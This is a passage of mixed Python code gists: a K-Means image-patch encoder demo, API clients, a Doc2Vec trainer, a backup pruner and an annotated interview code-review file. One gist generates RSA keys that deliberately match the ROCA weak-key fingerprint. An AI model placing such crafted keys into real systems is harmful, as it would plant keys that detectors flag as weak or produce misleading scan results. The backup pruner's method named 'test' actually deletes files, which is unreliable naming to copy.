self.whiten = whiten
self.max_iter = max_iter
self.n_init = n_init
self.n_components = n_components
self.local_contrast = local_contrast
self.n_prefit = n_prefit
self.verbose = verbose
self.tol = tol
self.transform_algorithm = transform_algorithm
self.transform_n_nonzero_coefs = transform_n_nonzero_coefs
self.transform_alpha = transform_alpha
self.split_sign = split_sign
self.n_jobs = n_jobs
def local_contrast_normalization(self, X):
"""Normalize the patch-wise variance of the signal
Parameters
----------
X: array-like, shape n_samples, n_features
Data to be normalized
Returns
-------
X:
Data after individual normalization of the samples
"""
# XXX: this should probably be extracted somewhere more general
# center all colour channels together
X = X.reshape((X.shape[0], -1))
X -= X.mean(axis=1)[:, None]
X_std = X.std(axis=1)
# Cap the divisor to avoid amplifying samples that are essentially
# a flat surface into full-contrast salt-and-pepper garbage.
# the actual value is a wild guess
# This trick is credited to <NAME>
min_divisor = (2 * X_std.min() + X_std.mean()) / 3
X /= np.maximum(min_divisor, X_std).reshape(
(X.shape[0], 1))
return X
def fit(self, X, y=None, **kwargs):
"""Fit the encoder on a collection of data, e.g. image patches.
Parameters
----------
X: array-like, shape: n_samples, n_features
the patch data to be fitted
Returns
-------
self: object
Returns the object itself
"""
X = np.atleast_2d(X)
n_samples, n_features = X.shape
# normalize each patch individually
if self.local_contrast:
if self.verbose:
print "Local contrast normalization of the data"
X = self.local_contrast_normalization(X)
# kmeans model to find the filters
if self.verbose:
print "About to extract atoms from %d samples" % n_samples
kmeans = KMeans(n_clusters=self.n_atoms, init='k-means++',
max_iter=self.max_iter, n_init=self.n_init,
tol=self.tol, verbose=self.verbose)
if self.whiten:
if self.verbose:
print "Whitening PCA of the samples"
self.pca = pca = PCA(whiten=True, n_components=self.n_components)
pca.fit(X)
X = pca.transform(X)
# compute the KMeans centers
if 0 < self.n_prefit < pca.n_components:
if self.verbose:
print "First KMeans in simplified curriculum space"
# starting the kmeans on a the projection to the first singular
# components: curriculum learning trick by <NAME>
kmeans.fit(X[:, :self.n_prefit])
# warm restart by padding previous centroids with zeros
# with full dimensionality this time
kmeans.init = np.zeros((self.n_atoms, pca.n_components),
dtype=kmeans.cluster_centers_.dtype)
kmeans.init[:, :self.n_prefit] = kmeans.cluster_centers_
if self.verbose:
print "Second KMeans in full whitened sample space"
kmeans.set_params(n_init=1).fit(X)
else:
if self.verbose:
print "KMeans in full original sample space"
# regular kmeans fit (without the curriculum trick)
kmeans.fit(X)
# project back the centers in original, non-whitened space (useful
# for qualitative inspection of the filters)
self.components_ = self.pca.inverse_transform(
kmeans.cluster_centers_)
else:
# find the kernel in the raw original dimensional space
# TODO: experiment with component wise scaling too
self.pca = None
kmeans.fit(X)
self.components_ = kmeans.cluster_centers_
self.kmeans = kmeans
self.inertia_ = kmeans.inertia_
return self
def transform(self, X, y=None):
"""Map a collection of samples into the feature space
""" + BaseDictionaryLearning.transform.__doc__
if self.local_contrast:
# TODO: make it inplace by default explictly
X = self.local_contrast_normalization(X)
return BaseDictionaryLearning.transform(self, X, y)
if __name__ == '__main__':
"""
Dictionary learning with K-Means on faces image data
====================================================
This shows 400 dictionary atoms learned from 6x6 image patches extracted from
the face recognition dataset. The dictionary atoms are learned using
(:ref:`KMeansCoder`), with and respectively without a whitening PCA transform.
The dataset used in this example is a preprocessed excerpt of the
"Labeled Faces in the Wild", aka LFW_:
http://vis-www.cs.umass.edu/lfw/lfw-funneled.tgz (233MB)
.. _LFW: http://vis-www.cs.umass.edu/lfw/
.. |kc_no_w| image:: /images/plot_kmeans_coder_1.png
:scale: 50%
.. |kc_w| image:: /images/plot_kmeans_coder_2.png
:scale: 50%
.. centered:: |kc_no_w| |kc_w|
"""
print __doc__
from time import time
import logging
import pylab as pl
import numpy as np
from sklearn.cross_validation import StratifiedKFold
from sklearn.datasets import fetch_lfw_people
from sklearn.feature_extraction.image import PatchExtractor
# Display progress logs on stdout
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(message)s')
###############################################################################
# Download the data, if not already on disk and load it as numpy arrays
lfw_people = fetch_lfw_people(min_faces_per_person=70, resize=0.4)
# reshape the data using the traditional (n_samples, n_features) shape
faces = lfw_people.data
n_samples, h, w = lfw_people.images.shape
X = faces
X -= X.mean(axis=1)[:, np.newaxis]
n_features = X.shape[1]
X = X.reshape((n_samples, h, w))
# the label to predict is the id of the person
y = lfw_people.target
target_names = lfw_people.target_names
n_classes = target_names.shape[0]
print "Total dataset size:"
print "n_samples: %d" % n_samples
print "n_features: %d" % n_features
print "n_classes: %d" % n_classes
###############################################################################
# Split into a training set and a test set using a stratified k fold
train, test = iter(StratifiedKFold(y, n_folds=4)).next()
X_train, X_test = X[train], X[test]
y_train, y_test = y[train], y[test]
###############################################################################
# Compute a PCA (eigenfaces) on the face dataset (treated as unlabeled
# dataset): unsupervised feature extraction / dimensionality reduction
n_atoms = 400
print "Extracting image patches from %d faces" % len(X_train)
t0 = time()
extr = PatchExtractor(patch_size=(6, 6), max_patches=100, random_state=0)
patches = extr.transform(X_train)
print "done in %0.3fs" % (time() - t0)
print "Extracting %d atoms from %d patches" % (
n_atoms, len(patches))
t0 = time()
patches = patches.reshape((patches.shape[0], patches.shape[1] * patches.shape[2]))
kc1 = KMeansCoder(n_atoms, max_iter=5, verbose=True, whiten=False).fit(patches)
print "done in %0.3fs" % (time() - t0)
print "Extracting %d whitened atoms from %d patches" % (
n_atoms, len(patches))
t0 = time()
kc2 = KMeansCoder(n_atoms, max_iter=5, verbose=True, whiten=True).fit(patches)
print "done in %0.3fs" % (time() - t0)
###############################################################################
# Qualitative evaluation of the extracted filters
n_row = int(np.sqrt(n_atoms))
n_col = int(np.sqrt(n_atoms))
titles = ["without whitening PCA", "with whitening PCA"]
for img_index, components in enumerate((kc1.components_, kc2.components_)):
pl.figure(figsize=(5, 6))
pl.suptitle("Dictionary learned with K-Means on the \n LFW dataset " +
titles[img_index])
for i, atom in enumerate(components):
pl.subplot(n_row, n_col, i + 1)
pl.imshow(atom.reshape((6, 6)), cmap=pl.cm.gray,
interpolation="nearest")
pl.xticks(())
pl.yticks(())
pl.subplots_adjust(0.02, 0.03, 0.98, 0.90, 0.14, 0.01)
pl.show()
```
#### File: hard-gists/795180/snippet.py
```python
from scrapy.spider import BaseSpider
# Requires this patch:
# https://github.com/joehillen/scrapy/commit/6301adcfe9933b91b3918a93387e669165a215c9
from scrapy.selector import PyQuerySelector
class DmozSpiderPyQuery(BaseSpider):
name = "pyquery"
allowed_domains = ["dmoz.org"]
start_urls = [
"http://www.dmoz.org/Computers/Programming/Languages/Python/Books/",
"http://www.dmoz.org/Computers/Programming/Languages/Python/Resources/"
]
def parse(self, response):
pq = PyQuerySelector(response)
sites = pq('ul li')
for site in sites:
title = pq(site).find('a').text()
link = pq(site).find('a').attr.href
desc = pq(site).text()
print title, link, desc
```
#### File: hard-gists/7a3fc9739b7778f6673a458605e18963/snippet.py
```python
from itertools import count
from collections import defaultdict
import numpy as np
from scipy.sparse import csr
def vectorize(lil, ix=None, p=None):
"""
Creates a scipy csr matrix from a list of lists (each inner list is a set of values corresponding to a feature)
parameters:
-----------
lil -- list of lists (dimension of inner lists should be the same)
ix -- index generator (default None)
p -- dimension of featrure space (number of columns in the sparse matrix) (default None)
"""
if (ix == None):
ix = defaultdict(count(0).next)
n = len(lil[0]) # num samples
g = len(lil) # num groups
nz = n * g # number of non-zeros
col_ix = np.empty(nz, dtype=int)
for i, d in enumerate(lil):
# append index k with __i in order to prevet mapping different columns with same id to same index
col_ix[i::g] = [ix[str(k) + '__' + str(i)] for k in d]
row_ix = np.repeat(np.arange(0, n), g)
data = np.ones(nz)
if (p == None):
p = len(ix)
# only features that are less than p (siz of feature vector) are considered
ixx = np.where(col_ix < p)
return csr.csr_matrix((data[ixx], (row_ix[ixx], col_ix[ixx])), shape=(n, p)), ix
```
#### File: hard-gists/7a9e046470dcf05420d4cdc2b2defd79/snippet.py
```python
from amazon.api import AmazonAPI
from amazon.api import AmazonException, LookupException, AsinNotFound
class AmazonAPIWrapper(object):
"""
pip install python-amazon-simple-product-api
"""
def __init__(self, account):
self.account = account
def __enter__(self):
self.API = AmazonAPI(
self.account["ACCESS_KEY"],
self.account["SECRET_KEY"],
self.account["ASSOC_TAG"],
region = self.account["REGION"] if "REGION" in self.account else "US")
return self
def __exit__(self, exception_type, exception_value, traceback):
pass
def Lookup(self, **kwargs):
if "ItemId" not in kwargs:
raise AmazonException("Not Set ItemId")
if isinstance(kwargs["ItemId"], list):
kwargs["ItemId"] = ",".join(kwargs["ItemId"])
response = self.API.lookup(**kwargs)
if hasattr(response, "__iter__"):
for item in response:
self.item = item
yield self
else:
self.item = response
yield self
def inches2cm(self, data):
return round(float(data) / 100 * 2.54, 2)
def pounds2g(self, data):
return round(float(data) / 100 * 0.4536 * 1000, 2)
@property
def region(self):
return self.API.region
@property
def asin(self):
return self.item.asin
@property
def title(self):
return self.item.title
@property
def category(self):
if len(self.item.browse_nodes) > 0:
for i in range(len(self.item.browse_nodes)):
name = self.item.browse_nodes[i].ancestors[-1].name
if name == "jp-stores":
continue
elif name is not None:
break
if hasattr(name, "text"):
return name.text
else:
return name
else:
return None
@property
def browsenode_id(self):
if len(self.item.browse_nodes) > 0:
for i in range(len(self.item.browse_nodes)):
name = self.item.browse_nodes[i].ancestors[-1].name
if name == "jp-stores":
continue
else:
return self.item.browse_nodes[i].id
else:
return None
@property
def image_url(self):
if self.item.medium_image_url:
return str(self.item.medium_image_url)
@property
def attributes(self):
return self.item.get_attributes([
"PackageDimensions.Weight",
"PackageDimensions.Width",
"PackageDimensions.Height",
"PackageDimensions.Length"
])
@property
def weight(self):
if "PackageDimensions.Weight" in self.attributes:
return self.pounds2g(self.attributes["PackageDimensions.Weight"])
@property
def raw_weight(self):
if "PackageDimensions.Weight" in self.attributes:
return self.attributes["PackageDimensions.Weight"]
@property
def width(self):
if "PackageDimensions.Width" in self.attributes:
return self.inches2cm(self.attributes["PackageDimensions.Width"])
@property
def raw_width(self):
if "PackageDimensions.Width" in self.attributes:
return self.attributes["PackageDimensions.Width"]
@property
def height(self):
if "PackageDimensions.Height" in self.attributes:
return self.inches2cm(self.attributes["PackageDimensions.Height"])
@property
def raw_height(self):
if "PackageDimensions.Height" in self.attributes:
return self.attributes["PackageDimensions.Height"]
@property
def length(self):
if "PackageDimensions.Length" in self.attributes:
return self.inches2cm(self.attributes["PackageDimensions.Length"])
@property
def raw_length(self):
if "PackageDimensions.Length" in self.attributes:
return self.attributes["PackageDimensions.Length"]
@property
def price(self):
price, currency = self.item.price_and_currency
return price
@property
def publication_date(self):
return self.item.publication_date
@property
def release_date(self):
return self.item.release_date
@property
def sales_rank(self):
return self.item.sales_rank
@property
def total_new(self):
return self.item._safe_get_element_text('OfferSummary.TotalNew')
@property
def brand(self):
return self.item.brand
@property
def manufacturer(self):
return self.item.manufacturer
@property
def ean(self):
return self.item.ean
if __name__ == "__main__":
account = {
"ACCESS_KEY": "ACCESS_KEY",
"SECRET_KEY": "SECRET_KEY",
"ASSOC_TAG": "associate-tag"
}
with AmazonAPIWrapper(account) as API:
try:
#API.setAsinFromFile(file)
#api.Asin = ["B00F5JOIT0", "B00TS0UK0I", "B00O9GPEAC"]
API.Asin = "B017VFHDKQ"
for item in API.Lookup():
print(item.total_new)
except Exception as e:
print(e)
```
#### File: hard-gists/7aea60f80f6aa9b79cc9509b633557c9/snippet.py
```python
from random import randint, choice
from gmpy2 import is_prime # pip install gmpy2
import operator
### Code from ROCA
primes = [3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101,
103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167]
prints = [6, 30, 126, 1026, 5658, 107286, 199410, 8388606, 536870910, 2147483646, 67109890, 2199023255550,
8796093022206, 140737488355326, 5310023542746834, 576460752303423486, 1455791217086302986,
147573952589676412926, 20052041432995567486, 6041388139249378920330, 207530445072488465666,
9671406556917033397649406,
618970019642690137449562110,
79228162521181866724264247298,
2535301200456458802993406410750,
1760368345969468176824550810518,
50079290986288516948354744811034,
473022961816146413042658758988474,
10384593717069655257060992658440190,
144390480366845522447407333004847678774,
2722258935367507707706996859454145691646,
174224571863520493293247799005065324265470,
696898287454081973172991196020261297061886,
713623846352979940529142984724747568191373310,
1800793591454480341970779146165214289059119882,
126304807362733370595828809000324029340048915994,
11692013098647223345629478661730264157247460343806,
187072209578355573530071658587684226515959365500926]
def has_fingerprint_real(modulus):
for i in range(0, len(primes)):
if (1 << (modulus % primes[i])) & prints[i] == 0:
return False
return True
## End code from ROCA
BITS = 1024
MOD = reduce(operator.mul, primes, 1)
residues_p = []
residues_q = []
for p, mask in zip(primes, prints):
res_p = randint(1, p-1)
res_q = choice([i for i, x in enumerate(bin(mask)[::-1]) if x == '1']) * pow(res_p, p - 2)
residues_p.append(res_p)
residues_q.append(res_q)
def CRT(n, a):
s = 0
for n_i, a_i in zip(n, a):
p = MOD / n_i
s += a_i * pow(p, n_i - 2) * p
return s % MOD
def get_prime(residues, bits):
b = CRT(primes, residues)
r_min = (1 << (bits - 1)) // MOD
r_max = (1 << (bits)) // MOD
while 1:
p = b + randint(r_min, r_max) * MOD
if is_prime(p):
break
return p
p = get_prime(residues_p, BITS//2)
q = get_prime(residues_q, BITS//2)
N = p * q
print "p =", p
print "q =", q
print "N =", N
print "Vulnerable according to tester:", has_fingerprint_real(N)
```
#### File: hard-gists/7ccd43b1f2f79f1bb23c70920f75cec4/snippet.py
```python
import uuid
import random
from afase.models.meta import Base
from sqlalchemy import (
Column,
Text,
Date,
ForeignKey,
String,
)
from sqlalchemy.types import (
TypeDecorator,
CHAR,
)
from sqlalchemy.dialects.postgresql import UUID
from sqlalchemy.orm import (
relationship,
validates,
)
# Trap, not really part of the code. Make them explain what it does anyhow.
class GUID(TypeDecorator):
"""Platform-independent GUID type.
Uses PostgreSQL's UUID type, otherwise uses
CHAR(32), storing as stringified hex values.
"""
impl = CHAR
# Based on how this class is used below, have them explain why the functions are named as they are.
def load_dialect_impl(self, dialect):
if dialect.name == 'postgresql':
return dialect.type_descriptor(UUID())
else:
return dialect.type_descriptor(CHAR(32))
def process_bind_param(self, value, dialect):
if value is None:
return value
elif dialect.name == 'postgresql':
return str(value)
else:
if not isinstance(value, uuid.UUID):
return "%.32x" % uuid.UUID(value).int
else:
# hexstring
return "%.32x" % value.int
def process_result_value(self, value, dialect):
if value is None:
return value
else:
return uuid.UUID(value)
# Trap, they'll skip this, point out that they missed something when they get to "create" function
ALPHABET = '0123456789abcdefghjkmnpqrtvwxyz'
ALPHA_SET = set(ALPHABET)
HEXIES = set('abcdef0123456789')
# Trap, this function should not be part of the data model, it should be internal. See if they catch on it.
def gen_word(count):
# Bug, shouldn't re-initialize RNG everytime we need it
r = random.SystemRandom()
word = ''.join(r.choice(ALPHABET) for x in range(count))
return word.capitalize()
class Token(Base):
__tablename__ = 'token'
id = Column(GUID, primary_key=True)
link = Column(Text, nullable=False)
token = Column(String(length=16), nullable=False, unique=True)
device = relationship('Device')
cabinet = relationship('Cabinet')
# Unnecessary, see if they catch why this have an init when the other classes don't.
def __init__(self, id, token, link):
self.id = id
self.token = token
self.link = link
# Simple, let them explain this
@validates('token')
def validate_token(self, key, token):
letters = set(token)
if not ALPHA_SET.issuperset(letters):
raise ValueError("Non permitted letter in token")
return token
# Incomplete, ask them to add more validations
@validates('link')
def validate_link(self, key, link):
if not link.startswith('https://'):
raise ValueError("Non https link")
if link[-1] in ('/', '?'):
raise ValueError("Link ends in invalid char")
if link.count("/") != 3:
raise ValueError("Should have 3 and only 3 slashes in link")
return link
def __repr__(self):
return "<Token(id='{}, token='{}', link='{}')>".format(self.id, self.token, self.link)
# Make them explain why this code exists. Describe how it will be used.
# All code exists for a reason, sometimes that reason is that a programmer was drunk.
@classmethod
def normalize(cls, token):
replacements = [('o', '0'),
('l', '1'),('i','1'),
('s', '5'),
('u', 'v'),
('-',''),('_',''), (' ', '')]
word = token.lower()
for old, new in replacements:
word = word.replace(old, new)
return word
@classmethod
def create(cls):
id = uuid.uuid4()
# Below line is tricky, make them explain what it does.
base = '-'.join(map(gen_word, [4] * 4))
link = "https://example.com/{}".format(base)
token = cls.normalize(base)
# Note the bug below, ask about subclass of this model.
return Token(id=id, link=link, token=token)
class Site(Base):
__tablename__ = 'site'
id = Column(GUID, primary_key=True)
name = Column(Text, nullable=False)
customer = Column(Text, nullable=False)
contact = Column(Text, nullable=True)
devices = relationship("Device")
cabinets = relationship("Cabinet")
# Leave TODO comments in, ask them to improve.
# TODO: Location(GPS)
# TODO: More contact fields?
class Cabinet(Base):
__tablename__ = 'cabinet'
id = Column(GUID, primary_key=True)
serial = Column(Text, nullable=False)
revision = Column(Text, nullable=False)
token = Column(GUID, ForeignKey('token.id'))
site = Column(GUID, ForeignKey('site.id'))
class Device(Base):
__tablename__ = 'device'
id = Column(GUID, primary_key=True)
boxid = Column(String(length=12), nullable=False)
kind = Column(Text, nullable=False)
token = Column(GUID, ForeignKey('token.id'))
site = Column(GUID, ForeignKey('site.id'), nullable=True)
deploy_date = Column(Date, nullable=True)
retire_date = Column(Date, nullable=True)
@validates('boxid')
def validate_token(self, key, boxid):
if not HEXIES.issuperset(set(boxid)):
raise ValueError("Non hex letter in boxid")
if not len(boxid) == 12:
raise ValueError("Box ID should be 12 long, no more, no less")
return boxid
```
#### File: hard-gists/7dc87b8d1dc16b025e7019113cc2de93/snippet.py
```python
from urllib.parse import urlunsplit
import requests
from oauthlib.oauth2 import LegacyApplicationClient
from requests_oauthlib import OAuth2Session
def register_app(client_name, host, redirect_uris='urn:ietf:wg:oauth:2.0:oob',
scopes='read write follow'):
"""Register application
Usage:
>>> d = register_app('myapp', host='pawoo.net')
>>> d
{'id': 1234, 'redirect_uri': 'urn:ietf:wg:oauth:2.0:oob', 'client_id': '...', 'client_secret': '...'}
"""
data = {
'client_name': client_name,
'redirect_uris': redirect_uris,
'scopes': scopes,
}
resp = requests.post("https://{host}/api/v1/apps".format(host=host), data=data)
resp.raise_for_status()
return resp.json()
def fetch_token(client_id, client_secret, email, password, host, scope=('read', 'write', 'follow')):
token_url = "https://{host}/oauth/token".format(host=host)
client = LegacyApplicationClient(client_id=client_id)
oauth = OAuth2Session(client=client)
token = oauth.fetch_token(token_url=token_url, username=email, password=password,
client_id=client_id, client_secret=client_secret, scope=scope)
return token
class Mstdn:
"""Mastodon API
Usage:
>>> token = fetch_token(...)
>>> mstdn = Mstdn(token)
>>> mstdn.toot("テスト")
"""
def __init__(self, token, scheme='https', host='pawoo.net'):
self.scheme = scheme
self.host = host
self.session = requests.Session()
self.session.headers.update({'Authorization': 'Bearer ' + token['access_token']})
def _build_url(self, path):
return urlunsplit([self.scheme, self.host, path, '', ''])
def _request(self, method, url, data=None, params=None):
kwargs = {
'data': data or {},
'params': params or {}
}
resp = self.session.request(method, url, **kwargs)
resp.raise_for_status()
return resp
def home_timeline(self):
url = self._build_url('/api/v1/timelines/home')
return self._request('get', url)
def toot(self, status):
url = self._build_url('/api/v1/statuses')
return self._request('post', url, data={'status': status})
```
#### File: hard-gists/7e9499ba7e436535fd94/snippet.py
```python
from django.db import transaction
class AtomicMixin(object):
"""
Ensures we rollback db transactions on exceptions.
Idea from https://github.com/tomchristie/django-rest-framework/pull/1204
"""
@transaction.atomic()
def dispatch(self, *args, **kwargs):
return super(AtomicMixin, self).dispatch(*args, **kwargs)
def handle_exception(self, *args, **kwargs):
response = super(AtomicMixin, self).handle_exception(*args, **kwargs)
if getattr(response, 'exception'):
# We've suppressed the exception but still need to rollback any transaction.
transaction.set_rollback(True)
return response
```
#### File: hard-gists/7eca8b9f0ff5b3bfb742/snippet.py
```python
import http.client
import ssl
import urllib.parse
def boxcarpush():
# Prepare the notification parameters
params = urllib.parse.urlencode({
'user_credentials': '<PASSWORD>',
'notification[title]': 'Menu Alert',
'notification[long_message]': 'Chicken and waffles are on the menu today!',
'notification[sound]': 'score'})
# Create a secure connection to Boxcar and POST the message
context = ssl.create_default_context()
conn = http.client.HTTPSConnection('new.boxcar.io', context=context)
conn.request('POST', '/api/notifications', params)
# Check the response
response = conn.getresponse()
print(response.status, response.reason)
data = response.read()
print(data)
# Clean up the connection
conn.close()
def get_daily_specials():
return '''Fried green tomatoes,
Chicken and waffles,
Beef stew,
Brussels sprouts,
Spam sandwich'''
def main():
menu = get_daily_specials()
if 'chicken and waffles' in menu.lower():
boxcarpush()
if __name__=='__main__':
main()
```
#### File: hard-gists/7f1737a750d8246d325e/snippet.py
```python
from lxml import etree
from elasticsearch.helpers import scan
from elasticsearch import Elasticsearch
from multiprocessing import Pool
import bz2
import gensim
import itertools
import logging
import nltk
import os
import re
import string
import random
import unicodedata
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.ERROR)
logging.getLogger('gensim').setLevel(logging.INFO)
tokenizer = nltk.tokenize.RegexpTokenizer(r'\w+')
parser = etree.XMLParser(recover=True)
es = Elasticsearch(['localhost'])
PROCESSES = 5
def create_model():
model = gensim.models.Doc2Vec(size=300, window=8, min_count=10, workers=16)
model.build_vocab(sentence_generator())
alpha, min_alpha, passes = (0.025, 0.001, 10)
alpha_delta = (alpha - min_alpha) / passes
for epoch in range(0, passes):
model.alpha, model.min_alpha = alpha, alpha
model.train(sentence_generator())
alpha -= alpha_delta
print('Finished epoch {}'.format(epoch))
model.save('doc2vec_model_300_10')
def get_sentences(document):
sentences = nltk.sent_tokenize(document['fields']['content'][0])
sentences = [tokenize(sent) for sent in sentences]
final = []
for sentence_num, sentence in enumerate(sentences):
if len(sentence) == 0:
continue
final.append(gensim.models.doc2vec.TaggedDocument(
words=sentence,
tags=['{}_{}'.format(document['_id'], sentence_num)]
))
return final
def sentence_generator():
documents = scan(
es, index='nabu',
scroll='30m', fields='content'
)
with Pool(processes=PROCESSES) as p:
for sentences in p.imap(get_sentences, documents):
for sentence in sentences:
yield sentence
es_replace = re.compile(r'es$')
s_replace = re.compile(r's$')
def remove_plural(token):
token = es_replace.sub('', token)
token = s_replace.sub('', token)
return token
num_replace = re.compile(r'[0-9]+')
def tokenize(sentence):
token_list = []
for token in tokenizer.tokenize(sentence):
nkfd_form = unicodedata.normalize('NFKD', token)
only_ascii = nkfd_form.encode('ASCII', 'ignore').decode('ascii')
final = num_replace.sub('DDD', only_ascii)
token_list.append(remove_plural(final.strip().lower()))
return token_list
if __name__ == '__main__':
create_model()
```
#### File: hard-gists/7f73238f55b7158b6852/snippet.py
```python
from django import forms
from django.forms.forms import NON_FIELD_ERRORS
class AddErrorMixin(object):
"Backport add_error() for django <1.7"
def add_error(self, field, msg):
field = field or NON_FIELD_ERRORS
if field in self._errors:
self._errors[field].append(msg)
else:
self._errors[field] = self.error_class([msg])
class ExampleForm(AddErrorMixin, forms.Form):
pass
```
#### File: hard-gists/7f79c85c8883268660bd/snippet.py
```python
import pymel.core as pm
import re
def parseVtxIdx(idxList):
"""convert vertex index list from strings to indexes.
idxList : [u'vtx[1]', u'vtx[3]', u'vtx[6]', u'vtx[8]', u'vtx[12:13]']
return : [1,3,6,8,12,13]
"""
parseIdxList = []
for idxName in idxList:
match = re.search(r'\[.+\]', idxName)
if match:
content = match.group()[1:-1]
if ':' in content:
tokens = content.split(':')
startTok = int(tokens[0])
endTok = int(tokens[1])
for rangeIdx in range(startTok, endTok + 1):
parseIdxList.append(rangeIdx)
else:
parseIdxList.append(int(content))
return parseIdxList
def recoverMesh(bsNode, weightIdx):
"""recover the blendshape target from blendshape target attribute.
usually blendshape targets are deleted after editing to save disk space and
save / load / calculation time.
but if you need to re-edit them later, there's no option in current maya tool
to do so.
"""
bsNode = pm.PyNode(bsNode)
bsNode.envelope.set(0)
aliasName = pm.aliasAttr(bsNode.weight[weightIdx], query=True)
finalMeshes = pm.listFuture(bsNode,type="mesh")
finalParent = None
newParent = None
# it is a group blendshapes
if len(finalMeshes) > 1:
finalParent = finalMeshes[0].getParent()
if finalParent:
newParent = pm.createNode('transform')
pm.rename(newParent, aliasName)
pm.delete(pm.parentConstraint(finalParent, newParent, mo=0))
for finalIdx, finalMesh in enumerate(finalMeshes):
newMesh = pm.duplicate(finalMesh)[0]
newMeshShape = newMesh.getShape()
vtxDeltaList = bsNode.inputTarget[finalIdx].inputTargetGroup[weightIdx].inputTargetItem[6000].inputPointsTarget.get()
vtxIdxList = bsNode.inputTarget[finalIdx].inputTargetGroup[weightIdx].inputTargetItem[6000].inputComponentsTarget.get()
# get bs shape
if vtxIdxList:
# need to convert [u'vtx[8]', u'vtx[11:13]] to [8,11,12,13]
singleIdxList = parseVtxIdx(vtxIdxList)
for vtxIdx,moveAmount in zip(singleIdxList,vtxDeltaList):
pm.move('%s.vtx[%d]'%(newMesh.name(),vtxIdx),moveAmount,r=1)
newMeshShape.worldMesh[0] >> bsNode.inputTarget[finalIdx].inputTargetGroup[weightIdx].inputTargetItem[6000].inputGeomTarget
if newParent:
pm.parent(newMesh,newParent)
pm.rename(newMesh,finalMesh.name())
else:
pm.rename(newMesh,aliasName)
if newMesh.getParent():
pm.parent(newMesh,world=1)
bsNode.envelope.set(1)
if newParent:
return newParent
elif newMesh:
return newMesh
recoverMesh("blendShape1",0)
```
#### File: hard-gists/8096192/snippet.py
```python
import re
from datetime import date
from path import path
class BackupPrune:
name_pattern = re.compile(
r'^(?P<year>\d{4})-(?P<month>\d{2})-(?P<day>\d{2})'
r'\.sql\.gz$'
)
keep_weekday = 6
keep_daily = 7
def __init__(self, backup_dir):
self.backup_dir = path(backup_dir)
self.today = date.today()
def enumerate(self):
for backup_path in sorted(self.backup_dir.listdir()):
match = self.name_pattern.match(backup_path.name)
if match:
backup_date = date(
int(match.group('year')),
int(match.group('month')),
int(match.group('day')),
)
yield (backup_date, backup_path)
def keep(self, backup_date):
if backup_date.weekday() == self.keep_weekday:
return True
elif (self.today - backup_date).days < self.keep_daily:
return True
else:
return False
def test(self):
for backup_date, backup_path in self.enumerate():
if not self.keep(backup_date):
print(u'✘', backup_path.name)
backup_path.unlink()
def main():
backup_dir = path(__file__).abspath().parent
bp = BackupPrune(backup_dir)
bp.test()
if __name__ == '__main__':
main()
```
#### File: hard-gists/809867d7110acbde87af/snippet.py
```python
import subprocess
from operator import itemgetter, methodcaller
import dbus
def get_current_track():
bus = dbus.SessionBus()
player = bus.get_object('com.spotify.qt', '/')
iface = dbus.Interface(player, 'org.freedesktop.MediaPlayer2')
info = iface.GetMetadata()
if not info:
return ['']
else:
artist = info['xesam:artist'][0]
title = info['xesam:title']
return [
u'♫ {artist} - {title} ♫'.format(artist=artist, title=title).encode('utf8')
]
def get_current_state(battery):
state = ''
pct = 100.0
output = subprocess.check_output(
'upower -i {} | grep -E "state|percentage"'.format(battery), shell=True
).strip().split('\n')
for line in map(methodcaller('strip'), output):
name, _, data = line.rpartition(' ')
if 'state' in name:
state = data
elif 'percentage' in name:
pct = float(data.rstrip('%'))
return state, pct
def as_hearts(percent, factor=10):
# FIXME: Show 1 full heart for every 10% it has
heart = u'♥'.encode('utf8')
num_full = int(round(percent / factor))
num_empty = (100 / factor) - num_full
full_hearts = heart * num_full
empty_hearts = heart * num_empty
return '#[fg=red,bg=black]{}#[fg=white,bg=black]{}'.format(full_hearts, empty_hearts)
def get_memory():
total = None
free = None
buffers = None
cached = None
with open('/proc/meminfo', 'r') as f:
for line in f:
if line.startswith('MemTotal:'):
total = float(line.strip().split(' ')[-2])
elif line.startswith('MemFree:'):
free = float(line.strip().split(' ')[-2])
elif line.startswith('Buffers:'):
buffers = float(line.strip().split(' ')[-2])
elif line.startswith('Cached:'):
cached = float(line.strip().split(' ')[-2])
# Convert to MB
total /= 1024.0
free /= 1024.0
buffers /= 1024.0
cached /= 1024.0
used = total - free - buffers - cached
pct = (used / total) * 100.0
if pct < 85:
color = '#[fg=white,bg=black]'
elif pct < 95:
color = '#[fg=yellow,bg=black]'
else:
color = '#[fg=red,bg=black]'
kwargs = {
'color': color,
'reset': '#[fg=white,bg=black]',
'free': int(used),
'total': int(total),
}
return ['{color}MEM: {free}/{total}MB{reset}'.format(**kwargs)]
def get_battery(factor=10):
status = []
output = subprocess.check_output('upower -e | grep BAT', shell=True).strip().split('\n')
batteries = map(methodcaller('strip'), output)
for battery in batteries:
_, _, name = battery.rpartition('_')
state, pct = get_current_state(battery)
if pct > 25:
color = '#[fg=white,bg=black]'
elif pct > 15:
color = '#[fg=yellow,bg=black]'
else:
color = '#[fg=red,bg=black]'
if state == 'charging':
color = '#[fg=green,bg=black]+'
status.append((name, as_hearts(pct, factor=factor), color))
return ['{}{}: {}#[fg=white,bg=black]'.format(c, b, h) for b, h, c in sorted(status, key=itemgetter(0))]
def get_loadavg():
with open('/proc/loadavg', 'r') as f:
loadavg = float(f.readline().strip().split(' ')[0])
if loadavg < 2.5:
color = '#[fg=white,bg=black]'
elif loadavg < 5:
color = '#[fg=yellow,bg=black]'
else:
color = '#[fg=red,bg=black]'
kwargs = {
'color': color,
'reset': '#[fg=white,bg=black]',
'load': '{:.2f}'.format(loadavg),
}
return ['{color}LOAD: {load}{reset}'.format(**kwargs)]
def main():
factor = 20
lines = []
lines += get_current_track()
lines += get_loadavg()
lines += get_memory()
lines += get_battery(factor=factor)
print '{} '.format(' | '.join(lines))
if __name__ == '__main__':
main()
```
#### File: hard-gists/809993/snippet.py
```python
from sandbox import models
from tastypie import fields
from apibase.resources import CamayakModelResource
from django.conf.urls.defaults import url
class ModelResource(CamayakModelResource):
def override_urls(self):
urls = []
for name, field in self.fields.items():
if isinstance(field, fields.ToManyField):
print field.to_class
resource = r"^(?P<resource_name>{resource_name})/(?P<{related_name}>.+)/{related_resource}/$".format(
resource_name=self._meta.resource_name,
related_name=field.related_name,
